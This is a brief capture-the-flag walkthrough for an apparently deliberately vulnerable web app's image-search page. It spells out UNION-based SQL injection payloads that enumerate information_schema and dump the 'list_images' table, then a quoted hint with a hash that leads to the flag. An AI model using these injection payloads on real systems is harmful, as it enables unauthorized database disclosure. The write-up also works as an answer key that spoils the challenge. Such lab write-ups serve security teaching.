1. Navigate to /?page=searchimg
2. Discover all of the table_names and it's columns names
   "42 UNION select table_name, column_name FROM information_schema.columns"
   Find out what are the columns names for "list_images" table. They are:
   - id
   - url
   - title
   - comment
3. Let's discover images url and comments:
   "42 UNION select url, comment from list_images"

   Find the hint:
   "If you read this just use this md5 decode lowercase then sha256 to win this flag ! : 1928e8083cf461a51303633093573c46"

   Do as suggested and you have the flag!
